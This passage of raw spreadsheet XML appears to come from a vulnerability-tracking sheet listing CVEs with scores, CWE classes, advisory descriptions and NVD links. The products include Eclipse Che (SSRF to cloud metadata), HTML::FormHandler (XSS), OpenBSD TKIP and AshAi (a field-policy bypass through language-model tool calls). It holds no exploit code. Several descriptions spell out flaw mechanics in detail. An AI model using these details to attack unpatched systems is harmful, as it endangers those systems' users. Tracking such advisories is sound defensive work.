t="inlineStr"><is><t>CWE-1321</t></is></c><c r="S1180" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t></is></c><c r="T1180" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81994</t></is></c></row><row r="1181"><c r="A1181" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1181" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1181" s="5" t="inlineStr"><is><t>CVE-2026-81997</t></is></c><c r="D1181" s="5" t="n"><v>6.3</v></c><c r="E1181" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1181" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1181" s="5" t="inlineStr" /><c r="H1181" s="5" t="n"><v>0.002</v></c><c r="I1181" s="5" t="inlineStr" /><c r="J1181" s="5" t="inlineStr" /><c r="K1181" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1181" s="5" t="inlineStr" /><c r="M1181" s="5" t="inlineStr" /><c r="N1181" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1181" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1181" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1181" s="5" t="inlineStr" /><c r="R1181" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1181" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t></is></c><c r="T1181" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81997</t></is></c></row><row r="1182"><c r="A1182" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1182" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1182" s="5" t="inlineStr"><is><t>CVE-2026-84942</t></is></c><c r="D1182" s="5" t="n"><v>6.3</v></c><c r="E1182" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1182" s="5" t="inlineStr"><is><t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t></is></c><c r="G1182" s="5" t="inlineStr" /><c r="H1182" s="5" t="n"><v>0.003</v></c><c r="I1182" s="5" t="inlineStr" /><c r="J1182" s="5" t="inlineStr" /><c r="K1182" s="5" t="inlineStr" /><c r="L1182" s="5" t="inlineStr" /><c r="M1182" s="5" t="inlineStr" /><c r="N1182" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1182" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1182" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1182" s="5" t="inlineStr" /><c r="R1182" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1182" s="5" t="inlineStr"><is><t>Improper input validation in the Vega expression function implementation in OpenSearch Dashboards allows a remote authenticated actor with dashboard write permissions to execute arbitrary JavaScript in the context of other users' browser sessions by saving a crafted Vega visualization. The checkForFunctionProperty validation routine failed to recurse into arrays of objects, allowing a function property nested inside an array to bypass validation.</t></is></c><c r="T1182" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84942</t></is></c></row><row r="1183"><c r="A1183" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1183" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1183" s="5" t="inlineStr"><is><t>CVE-2026-86590</t></is></c><c r="D1183" s="5" t="n"><v>6.3</v></c><c r="E1183" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1183" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G1183" s="5" t="inlineStr" /><c r="H1183" s="5" t="n"><v>0.004</v></c><c r="I1183" s="5" t="inlineStr" /><c r="J1183" s="5" t="inlineStr"><is><t>kubernetes</t></is></c><c r="K1183" s="5" t="inlineStr" /><c r="L1183" s="5" t="inlineStr" /><c r="M1183" s="5" t="inlineStr" /><c r="N1183" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1183" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1183" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1183" s="5" t="inlineStr" /><c r="R1183" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1183" s="5" t="inlineStr"><is><t>In Eclipse Che versions 7.79.0 through 7.121.0, the dashboard backend's POST /dashboard/api/data/resolver endpoint passes a caller-supplied URL directly to an outbound HTTP GET request with no host filtering. An authenticated user can exploit this server-side request forgery (SSRF) to read responses from internal network addresses, including the cloud instance metadata service (169.254.169.254), loopback interfaces, RFC-1918 private ranges, and in-cluster Kubernetes services. The operator-configured allowlist (spec.devEnvironments.allowedSources.urls) is not consulted. The vulnerability is fixed in version 7.122.0, which adds private-address blocking, IPv4-mapped IPv6 bypass prevention, operator allowlist enforcement, and disables HTTP redirects on the outbound request.</t></is></c><c r="T1183" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86590</t></is></c></row><row r="1184"><c r="A1184" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1184" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1184" s="5" t="inlineStr"><is><t>CVE-2026-18090</t></is></c><c r="D1184" s="5" t="n"><v>6.1</v></c><c r="E1184" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1184" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1184" s="5" t="inlineStr" /><c r="H1184" s="5" t="n"><v>0.002</v></c><c r="I1184" s="5" t="inlineStr" /><c r="J1184" s="5" t="inlineStr" /><c r="K1184" s="5" t="inlineStr" /><c r="L1184" s="5" t="inlineStr" /><c r="M1184" s="5" t="inlineStr" /><c r="N1184" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1184" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1184" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1184" s="5" t="inlineStr" /><c r="R1184" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1184" s="5" t="inlineStr"><is><t>A flaw was found in gdk-pixbuf. This vulnerability allows a remote attacker to cause a heap out-of-bounds read by providing a specially crafted Apple Icon Image (.icns) file. The uncompress() function, which handles RLE-encoded ICNS icon data, fails to validate the source buffer's boundaries during decompression. This can lead to a denial of service, where the application crashes, or to information disclosure, potentially revealing sensitive data from adjacent memory.</t></is></c><c r="T1184" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18090</t></is></c></row><row r="1185"><c r="A1185" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1185" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1185" s="5" t="inlineStr"><is><t>CVE-2026-19872</t></is></c><c r="D1185" s="5" t="n"><v>6.1</v></c><c r="E1185" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1185" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1185" s="5" t="inlineStr" /><c r="H1185" s="5" t="n"><v>0.003</v></c><c r="I1185" s="5" t="inlineStr" /><c r="J1185" s="5" t="inlineStr" /><c r="K1185" s="5" t="inlineStr" /><c r="L1185" s="5" t="inlineStr" /><c r="M1185" s="5" t="inlineStr" /><c r="N1185" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1185" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1185" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1185" s="5" t="inlineStr" /><c r="R1185" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1185" s="5" t="inlineStr"><is><t>HTML::FormHandler versions before 0.410000 for Perl allow cross-site scripting via a submitted value rendered unescaped in an error message.

The wrappers and renderers that emit a form's errors interpolate the error string straight into HTML with no escaping. Two of the library's own messages, no_match and not_allowed, splice the submitted value into that string, and a failing type constraint puts the rejected value into the message it builds, which _apply_actions hands to add_error.

A field declared with a check regexp, a check list or a type constraint reaches those messages, with no custom validator and no non-default configuration. Errors rendered through an application's own escaping template layer rather than the library's rendering roles are not affected.

A request over the network that submits markup to such a field gets it back live inside the error span, running script in the victim's origin. Re-rendering a rejected value later gives the stored variant.</t></is></c><c r="T1185" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19872</t></is></c></row><row r="1186"><c r="A1186" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1186" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1186" s="5" t="inlineStr"><is><t>CVE-2026-63523</t></is></c><c r="D1186" s="5" t="n"><v>6.1</v></c><c r="E1186" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1186" s="5" t="inlineStr" /><c r="H1186" s="5" t="n"><v>0.007</v></c><c r="I1186" s="5" t="inlineStr" /><c r="J1186" s="5" t="inlineStr" /><c r="K1186" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1186" s="5" t="inlineStr" /><c r="M1186" s="5" t="inlineStr" /><c r="N1186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1186" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1186" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1186" s="5" t="inlineStr" /><c r="R1186" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1186" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Skype for Business allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T1186" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-63523</t></is></c></row><row r="1187"><c r="A1187" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1187" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1187" s="5" t="inlineStr"><is><t>CVE-2026-69642</t></is></c><c r="D1187" s="5" t="n"><v>6.1</v></c><c r="E1187" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1187" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1187" s="5" t="inlineStr" /><c r="H1187" s="5" t="n"><v>0.003</v></c><c r="I1187" s="5" t="inlineStr" /><c r="J1187" s="5" t="inlineStr" /><c r="K1187" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L1187" s="5" t="inlineStr" /><c r="M1187" s="5" t="inlineStr" /><c r="N1187" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1187" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1187" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1187" s="5" t="inlineStr" /><c r="R1187" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1187" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Skype for Business allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T1187" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69642</t></is></c></row><row r="1188"><c r="A1188" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1188" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1188" s="5" t="inlineStr"><is><t>CVE-2026-76002</t></is></c><c r="D1188" s="5" t="n"><v>6.1</v></c><c r="E1188" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1188" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1188" s="5" t="inlineStr" /><c r="H1188" s="5" t="n"><v>0.007</v></c><c r="I1188" s="5" t="inlineStr" /><c r="J1188" s="5" t="inlineStr" /><c r="K1188" s="5" t="inlineStr" /><c r="L1188" s="5" t="inlineStr" /><c r="M1188" s="5" t="inlineStr" /><c r="N1188" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1188" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1188" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1188" s="5" t="inlineStr" /><c r="R1188" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1188" s="5" t="inlineStr"><is><t>ColdFusion is affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. Scope is changed.</t></is></c><c r="T1188" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76002</t></is></c></row><row r="1189"><c r="A1189" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1189" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1189" s="5" t="inlineStr"><is><t>CVE-2026-77654</t></is></c><c r="D1189" s="5" t="n"><v>6.1</v></c><c r="E1189" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1189" s="5" t="inlineStr"><is><t>security.vulnerabilities@algosec.com</t></is></c><c r="G1189" s="5" t="inlineStr" /><c r="H1189" s="5" t="n"><v>0.001</v></c><c r="I1189" s="5" t="inlineStr" /><c r="J1189" s="5" t="inlineStr" /><c r="K1189" s="5" t="inlineStr" /><c r="L1189" s="5" t="inlineStr" /><c r="M1189" s="5" t="inlineStr" /><c r="N1189" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1189" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1189" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1189" s="5" t="inlineStr" /><c r="R1189" s="5" t="inlineStr"><is><t>CWE-266</t></is></c><c r="S1189" s="5" t="inlineStr"><is><t>Improper Privilege Management vulnerability in Horizon Security Analyzer (formerly AlgoSec Firewall Analyzer) on Linux, 64 bit allows Privilege Escalation and Parameter Injection.

A local user with access to the command line may escalate their privileges by abusing the parameters of a command that is approved in the sudoers file. 


This issue affects Horizon Security Analyzer : A33.10, A33.20 and A33.30.</t></is></c><c r="T1189" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77654</t></is></c></row><row r="1190"><c r="A1190" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1190" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1190" s="5" t="inlineStr"><is><t>CVE-2026-78738</t></is></c><c r="D1190" s="5" t="n"><v>6.1</v></c><c r="E1190" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1190" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1190" s="5" t="inlineStr" /><c r="H1190" s="5" t="n"><v>0.002</v></c><c r="I1190" s="5" t="inlineStr" /><c r="J1190" s="5" t="inlineStr" /><c r="K1190" s="5" t="inlineStr" /><c r="L1190" s="5" t="inlineStr" /><c r="M1190" s="5" t="inlineStr" /><c r="N1190" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1190" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1190" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1190" s="5" t="inlineStr" /><c r="R1190" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1190" s="5" t="inlineStr"><is><t>Silverpeas Core 6.4.6 is vulnerable to Cross Site Scripting (XSS) via the Document management file upload feature.</t></is></c><c r="T1190" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78738</t></is></c></row><row r="1191"><c r="A1191" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1191" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1191" s="5" t="inlineStr"><is><t>CVE-2026-78741</t></is></c><c r="D1191" s="5" t="n"><v>6.1</v></c><c r="E1191" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1191" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1191" s="5" t="inlineStr" /><c r="H1191" s="5" t="n"><v>0.002</v></c><c r="I1191" s="5" t="inlineStr" /><c r="J1191" s="5" t="inlineStr" /><c r="K1191" s="5" t="inlineStr" /><c r="L1191" s="5" t="inlineStr" /><c r="M1191" s="5" t="inlineStr" /><c r="N1191" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1191" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1191" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1191" s="5" t="inlineStr" /><c r="R1191" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1191" s="5" t="inlineStr"><is><t>Silverpeas Core &lt;=6.4.6 is vulnerable to Cross Site Scripting (XSS) in the wysiwyg-CKEditor image upload feature.</t></is></c><c r="T1191" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78741</t></is></c></row><row r="1192"><c r="A1192" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1192" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1192" s="5" t="inlineStr"><is><t>CVE-2026-78742</t></is></c><c r="D1192" s="5" t="n"><v>6.1</v></c><c r="E1192" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1192" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1192" s="5" t="inlineStr" /><c r="H1192" s="5" t="n"><v>0.002</v></c><c r="I1192" s="5" t="inlineStr" /><c r="J1192" s="5" t="inlineStr" /><c r="K1192" s="5" t="inlineStr" /><c r="L1192" s="5" t="inlineStr" /><c r="M1192" s="5" t="inlineStr" /><c r="N1192" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1192" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1192" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1192" s="5" t="inlineStr" /><c r="R1192" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1192" s="5" t="inlineStr"><is><t>Silverpeas Core &lt;=6.4.6 is vulnerable to Cross Site Scripting (XSS) via the Multimedia library application introduction.</t></is></c><c r="T1192" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78742</t></is></c></row><row r="1193"><c r="A1193" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1193" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1193" s="5" t="inlineStr"><is><t>CVE-2026-85484</t></is></c><c r="D1193" s="5" t="n"><v>6.1</v></c><c r="E1193" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1193" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1193" s="5" t="inlineStr" /><c r="H1193" s="5" t="n"><v>0.003</v></c><c r="I1193" s="5" t="inlineStr" /><c r="J1193" s="5" t="inlineStr" /><c r="K1193" s="5" t="inlineStr" /><c r="L1193" s="5" t="inlineStr" /><c r="M1193" s="5" t="inlineStr" /><c r="N1193" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1193" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1193" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1193" s="5" t="inlineStr" /><c r="R1193" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1193" s="5" t="inlineStr"><is><t>HTML::FormHandler versions before 0.410002 for Perl render option group labels and radio button labels into HTML without escaping.

The Select, RadioGroup, CheckboxGroup and HorizCheckboxGroup widgets render a group label unescaped, Select into a label attribute and the other three into element content. RadioGroup also renders each radio button's own label unescaped.

Any application whose option list is built from data rather than literals, using options_from, an options_fieldname method, or the DBIC model, allows attacker-influenced text in a label that can override the options or embed JavaScript in rendered pages.</t></is></c><c r="T1193" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85484</t></is></c></row><row r="1194"><c r="A1194" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1194" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1194" s="5" t="inlineStr"><is><t>CVE-2026-85485</t></is></c><c r="D1194" s="5" t="n"><v>6.1</v></c><c r="E1194" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1194" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1194" s="5" t="inlineStr" /><c r="H1194" s="5" t="n"><v>0.002</v></c><c r="I1194" s="5" t="inlineStr" /><c r="J1194" s="5" t="inlineStr" /><c r="K1194" s="5" t="inlineStr" /><c r="L1194" s="5" t="inlineStr" /><c r="M1194" s="5" t="inlineStr" /><c r="N1194" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1194" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1194" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1194" s="5" t="inlineStr" /><c r="R1194" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1194" s="5" t="inlineStr"><is><t>HTML::FormHandler versions before 0.410002 for Perl render some error messages into HTML without escaping.

The Table form layout and the Bootstrap 2 and 3 wrappers splice each error string straight into the surrounding markup. Version 0.410000, the fix for CVE-2026-19872, escaped the equivalent values in the other layouts and wrappers, and 0.410002 extended that to these three.

Error messages that contain attacker-influenced content such as rejected field values could embed JavaScript in rendered pages.</t></is></c><c r="T1194" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85485</t></is></c></row><row r="1195"><c r="A1195" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1195" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1195" s="5" t="inlineStr"><is><t>CVE-2026-85630</t></is></c><c r="D1195" s="5" t="n"><v>6.1</v></c><c r="E1195" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1195" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1195" s="5" t="inlineStr" /><c r="H1195" s="5" t="n"><v>0.003</v></c><c r="I1195" s="5" t="inlineStr" /><c r="J1195" s="5" t="inlineStr" /><c r="K1195" s="5" t="inlineStr" /><c r="L1195" s="5" t="inlineStr" /><c r="M1195" s="5" t="inlineStr" /><c r="N1195" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1195" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1195" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1195" s="5" t="inlineStr" /><c r="R1195" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1195" s="5" t="inlineStr"><is><t>HTML::FormHandler versions before 0.410002 for Perl render field attributes into HTML without escaping using the process_attrs method.

Any application with fields or field labels where some attributes are built from data rather than literals allows attacker-influenced text in an attribute value that can override the field attributes or embed JavaScript in rendered pages.

For example, the RadioGroup widget uses the process_attrs method via the render_option and wrap_radio methods.</t></is></c><c r="T1195" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85630</t></is></c></row><row r="1196"><c r="A1196" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1196" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1196" s="5" t="inlineStr"><is><t>CVE-2026-56101</t></is></c><c r="D1196" s="5" t="n"><v>6</v></c><c r="E1196" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1196" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1196" s="5" t="inlineStr" /><c r="H1196" s="5" t="n"><v>0.004</v></c><c r="I1196" s="5" t="inlineStr" /><c r="J1196" s="5" t="inlineStr" /><c r="K1196" s="5" t="inlineStr" /><c r="L1196" s="5" t="inlineStr" /><c r="M1196" s="5" t="inlineStr" /><c r="N1196" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1196" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1196" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1196" s="5" t="inlineStr" /><c r="R1196" s="5" t="inlineStr"><is><t>CWE-697</t></is></c><c r="S1196" s="5" t="inlineStr"><is><t>OpenBSD before commit 1ee99df contains an inverted comparison vulnerability in the ieee80211_michael_mic_failure() function within sys/net80211/ieee80211_crypto_tkip.c that allows unauthenticated attackers within RF range to trigger denial of service by sending two malformed TKIP frames separated by more than 60 seconds. Attackers can exploit the reversed TKIP MIC failure countermeasure window check to deauthenticate all associated TKIP stations and block reassociation for up to 90 seconds, while within-window MIC failures that should engage countermeasures are silently discarded, leaving key-recovery attempts undetected.</t></is></c><c r="T1196" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56101</t></is></c></row><row r="1197"><c r="A1197" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1197" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1197" s="5" t="inlineStr"><is><t>CVE-2026-78216</t></is></c><c r="D1197" s="5" t="n"><v>6</v></c><c r="E1197" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1197" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1197" s="5" t="inlineStr" /><c r="H1197" s="5" t="n"><v>0.002</v></c><c r="I1197" s="5" t="inlineStr" /><c r="J1197" s="5" t="inlineStr" /><c r="K1197" s="5" t="inlineStr" /><c r="L1197" s="5" t="inlineStr" /><c r="M1197" s="5" t="inlineStr" /><c r="N1197" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1197" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1197" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1197" s="5" t="inlineStr" /><c r="R1197" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S1197" s="5" t="inlineStr"><is><t>AshLua exposes Ash read actions to Lua scripts run through an eval action. A read call accepts an operation (list, min, max, first, sum, avg) that builds an ad-hoc Ash.Query.Aggregate over a named field and returns its raw value.

Ash field policies redact forbidden fields on returned records (replacing them with %Ash.ForbiddenField{}), but that redaction does not apply to aggregate values. A script could therefore read a field the calling actor's field policies forbid by requesting it as an aggregate instead of as a field. This includes fields that are public? true but restricted per-actor by a field policy, such as sensitive PII. The prior hardening only enforced the exposed-field allow-list (field visibility), which is a separate axis from per-actor field-policy authorization.

The fix authorizes the aggregated field against the resource's field policies, so aggregating over a field the actor may not see is refused or scoped to the rows where it is visible.

This issue affects ash_lua: from 0.1.0 before 0.2.2.</t></is></c><c r="T1197" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78216</t></is></c></row><row r="1198"><c r="A1198" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1198" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1198" s="5" t="inlineStr"><is><t>CVE-2026-78230</t></is></c><c r="D1198" s="5" t="n"><v>6</v></c><c r="E1198" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1198" s="5" t="inlineStr"><is><t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t></is></c><c r="G1198" s="5" t="inlineStr" /><c r="H1198" s="5" t="n"><v>0.002</v></c><c r="I1198" s="5" t="inlineStr" /><c r="J1198" s="5" t="inlineStr" /><c r="K1198" s="5" t="inlineStr" /><c r="L1198" s="5" t="inlineStr" /><c r="M1198" s="5" t="inlineStr" /><c r="N1198" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1198" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1198" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1198" s="5" t="inlineStr" /><c r="R1198" s="5" t="inlineStr"><is><t>CWE-1220</t></is></c><c r="S1198" s="5" t="inlineStr"><is><t>AshAi exposes Ash read actions to language-model tool calls. The read tool accepts an aggregate result type (min, max, sum, avg) that builds an ad-hoc Ash.Query.Aggregate over a named field and returns its raw value.

Ash field policies redact forbidden fields on returned records (replacing them with %Ash.ForbiddenField{}), but that redaction does not apply to aggregate values. A tool caller could therefore read a field the calling actor's field policies forbid by requesting it as an aggregate; min/max in particular return an actual field value. This includes fields that are public? true but restricted per-actor by a field policy, such as sensitive PII. The tool's existing check only required the field to be public, which is a separate axis from per-actor field-policy authorization.

The fix authorizes the aggregated field against the resource's field policies, so aggregating over a field the actor may not see is refused or scoped to the rows where it is visible.

